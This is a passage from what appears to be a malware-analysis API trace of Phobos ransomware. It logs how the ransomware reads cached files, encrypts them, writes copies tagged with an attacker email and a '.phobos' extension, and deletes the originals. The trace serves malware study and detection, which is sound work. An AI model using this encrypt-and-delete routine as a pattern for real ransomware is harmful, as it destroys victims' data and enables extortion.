lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.296] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_f2318f7ab33980a131a265454c39ca30.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0196.297] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa327e8) returned 1 [0196.297] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.297] ReadFile (in: hFile=0x124, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x1cf, lpOverlapped=0x0) returned 1 [0196.298] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1d0, dwBufLen=0x1d0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1d0) returned 1 [0196.298] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1d0, lpOverlapped=0x0) returned 1 [0196.299] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0196.299] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.299] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0196.299] CryptDestroyKey (hKey=0xa32a28) returned 1 [0196.299] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0196.299] CryptDestroyKey (hKey=0xa327e8) returned 1 [0196.299] CloseHandle (hObject=0x124) returned 1 [0196.299] CloseHandle (hObject=0x194) returned 1 [0196.299] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_f2318f7ab33980a131a265454c39ca30")) returned 1 [0196.300] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0196.300] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_f6e15778dc8e326895c606fbfa0392eb"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0196.300] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=463) returned 1 [0196.300] CloseHandle (hObject=0x194) returned 1 [0196.300] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_f6e15778dc8e326895c606fbfa0392eb")) returned 0x2024 [0196.300] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_f6e15778dc8e326895c606fbfa0392eb.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.300] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_f6e15778dc8e326895c606fbfa0392eb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0196.300] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.300] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.301] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_f6e15778dc8e326895c606fbfa0392eb.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0196.301] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa327e8) returned 1 [0196.301] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.301] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x1cf, lpOverlapped=0x0) returned 1 [0196.302] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1d0, dwBufLen=0x1d0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1d0) returned 1 [0196.302] WriteFile (in: hFile=0x124, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1d0, lpOverlapped=0x0) returned 1 [0196.303] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0196.303] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.303] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0196.303] CryptDestroyKey (hKey=0xa32a28) returned 1 [0196.303] WriteFile (in: hFile=0x124, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0196.303] CryptDestroyKey (hKey=0xa327e8) returned 1 [0196.303] CloseHandle (hObject=0x194) returned 1 [0196.303] CloseHandle (hObject=0x124) returned 1 [0196.303] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_f6e15778dc8e326895c606fbfa0392eb")) returned 1 [0196.304] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0196.304] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\828298824ea5549947c17ddabf6871f5_0206efbc540300c3bf0163cdbc3d7d56"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0196.304] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1390) returned 1 [0196.304] CloseHandle (hObject=0x124) returned 1 [0196.305] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\828298824ea5549947c17ddabf6871f5_0206efbc540300c3bf0163cdbc3d7d56")) returned 0x2024 [0196.305] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\828298824ea5549947c17ddabf6871f5_0206efbc540300c3bf0163cdbc3d7d56.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.305] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\828298824ea5549947c17ddabf6871f5_0206efbc540300c3bf0163cdbc3d7d56"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0196.305] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.305] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.305] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\828298824ea5549947c17ddabf6871f5_0206efbc540300c3bf0163cdbc3d7d56.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0196.305] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa327e8) returned 1 [0196.305] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.305] ReadFile (in: hFile=0x124, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x56e, lpOverlapped=0x0) returned 1 [0196.350] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x570, dwBufLen=0x570 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x570) returned 1 [0196.350] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x570, lpOverlapped=0x0) returned 1 [0196.351] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ce8) returned 1 [0196.351] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.351] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0196.351] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0196.351] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0196.351] CryptDestroyKey (hKey=0xa327e8) returned 1 [0196.351] CloseHandle (hObject=0x124) returned 1 [0196.352] CloseHandle (hObject=0x194) returned 1 [0196.352] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\828298824ea5549947c17ddabf6871f5_0206efbc540300c3bf0163cdbc3d7d56")) returned 1 [0196.353] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0196.353] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\94308059b57b3142e455b38a6eb92015"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0196.353] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=53978) returned 1 [0196.353] CloseHandle (hObject=0x194) returned 1 [0196.354] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\94308059b57b3142e455b38a6eb92015")) returned 0x2024 [0196.354] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\94308059b57b3142e455b38a6eb92015.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.354] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\94308059b57b3142e455b38a6eb92015"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0196.354] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.354] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.354] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\94308059b57b3142e455b38a6eb92015.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0196.355] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa327e8) returned 1 [0196.355] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.355] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xd2da, lpOverlapped=0x0) returned 1 [0196.391] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xd2e0, dwBufLen=0xd2e0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xd2e0) returned 1 [0196.392] WriteFile (in: hFile=0x124, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xd2e0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xd2e0, lpOverlapped=0x0) returned 1 [0196.393] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32de8) returned 1 [0196.393] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.393] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0196.393] CryptDestroyKey (hKey=0xa32de8) returned 1 [0196.393] WriteFile (in: hFile=0x124, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0196.393] CryptDestroyKey (hKey=0xa327e8) returned 1 [0196.393] CloseHandle (hObject=0x194) returned 1 [0196.393] CloseHandle (hObject=0x124) returned 1 [0196.393] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\94308059b57b3142e455b38a6eb92015")) returned 1 [0196.395] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0196.395] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9bc2ffc5d9591e1bd3545230e9b7cc36_cf30943571f9bee96c487b2d9f0436e6"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0196.404] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1451) returned 1 [0196.404] CloseHandle (hObject=0x17c) returned 1 [0196.404] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9bc2ffc5d9591e1bd3545230e9b7cc36_cf30943571f9bee96c487b2d9f0436e6")) returned 0x2024 [0196.404] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9bc2ffc5d9591e1bd3545230e9b7cc36_cf30943571f9bee96c487b2d9f0436e6.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.404] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9bc2ffc5d9591e1bd3545230e9b7cc36_cf30943571f9bee96c487b2d9f0436e6"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0196.404] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.404] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.404] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9bc2ffc5d9591e1bd3545230e9b7cc36_cf30943571f9bee96c487b2d9f0436e6.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0196.408] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa328a8) returned 1 [0196.408] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.408] ReadFile (in: hFile=0x17c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x5ab, lpOverlapped=0x0) returned 1 [0196.472] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x5b0, dwBufLen=0x5b0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x5b0) returned 1 [0196.472] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x5b0, lpOverlapped=0x0) returned 1 [0196.473] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0196.473] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.473] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0196.473] CryptDestroyKey (hKey=0xa32a28) returned 1 [0196.473] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, 